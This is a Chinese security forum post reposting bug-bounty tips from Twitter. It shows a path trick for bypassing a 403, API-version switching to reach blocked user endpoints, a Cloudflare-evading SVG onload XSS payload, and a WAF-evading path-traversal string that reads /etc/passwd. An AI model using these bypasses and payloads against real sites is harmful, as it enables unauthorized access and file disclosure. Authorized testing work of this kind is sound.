设为首页收藏本站
开启辅助访问 切换到窄版

安全矩阵

 找回密码
 立即注册
搜索
安全矩阵»安全矩阵 安全矩阵实验室 技术转载 干货 | Twitter渗透技巧搬运工(四)
返回列表 发新帖
查看: 1359|回复: 0

干货 | Twitter渗透技巧搬运工(四)

[复制链接]
margin

189

主题

191

帖子

903

积分

高级会员

Rank: 4

积分
903
发表于 2022-8-21 22:17:40 | 显示全部楼层 |阅读模式
干货 | Twitter渗透技巧搬运工(四)

​Bug type: 403 Bypass
  1. site[.]com/env => 403 Forbidden
  2. site[.]com/env/HTTPS2 => Bypassed
复制代码

编辑
编辑
Bug Bounty Dorks
编辑
API hackingAPI hacking Status: [Dup] Internally known
Tip: Check endpoint's on different api versions
  1. 1. GET /v2/users or /v2/users.json -> 403
  2. 2. GET /v3/users -> 403
  3. 3. GET /v3/users.json -> 200
  4. 4. GET /v4/users -> 200
  5. 5. POST /v4/users -> 200 [Users created]
复制代码

bugbounty poc集合
  1. https://github.com/zeroc00I/AllVideoPocsFromHackerOne/tree/main/weakness
复制代码


命令注入备忘录
编辑
Cloudfalre XSS Bypass
  1. <pre class="cke_widget_element" data-cke-widget-data="%7B%22code%22%3A%22%5C%22%3E%3CsVg%2FOnLuFy%3D%5C%22X%3Dy%5C%22oNloaD%3D%3B1%5Econfirm(1)%3E%2F%60%60%5E1%2F%2F%22%2C%22classes%22%3Anull%7D" data-cke-widget-keep-attr="0" data-cke-widget-upcasted="1" data-widget="codeSnippet"><code class="hljs">"><sVg/OnLuFy="X=y"oNloaD=;1^confirm(1)>/``^1//</code></pre>
  2. <span class="cke_reset cke_widget_drag_handler_container" style="background: url(" https:="" csdnimg.cn="" release="" blog_editor_html="" release2.1.9="" ckeditor="" plugins="" widget="" images="" handle.png")="" rgba(220,="" 220,="" 0.5);="" top:="" 0px;="" left:="" 0px;"=""></span>
复制代码


来源:https://github.com/HernanRodriguez1
补充阅读:XSS 绕过 CLOUDFLARE + 过滤器
  1. <pre class="cke_widget_element" data-cke-widget-data="%7B%22code%22%3A%22https%3A%2F%2F0xjin.medium.com%2Fnew-xss-bypass-cloudflare-filters-2a878c01d312%22%2C%22classes%22%3Anull%7D" data-cke-widget-keep-attr="0" data-cke-widget-upcasted="1" data-widget="codeSnippet"><code class="hljs">https://0xjin.medium.com/new-xss-bypass-cloudflare-filters-2a878c01d312</code></pre>
  2. <span class="cke_reset cke_widget_drag_handler_container" style="background: url(" https:="" csdnimg.cn="" release="" blog_editor_html="" release2.1.9="" ckeditor="" plugins="" widget="" images="" handle.png")="" rgba(220,="" 220,="" 0.5);="" top:="" 0px;="" left:="" 0px;"=""></span>
复制代码


本地文件包含 WAF (Cloudflare) bypass

  2. ../../etc/passwd = 403 Forbidden
  3. ../../etc/random/../passwd = 200 OK
复制代码




回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2025-4-29 16:13 , Processed in 0.012251 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表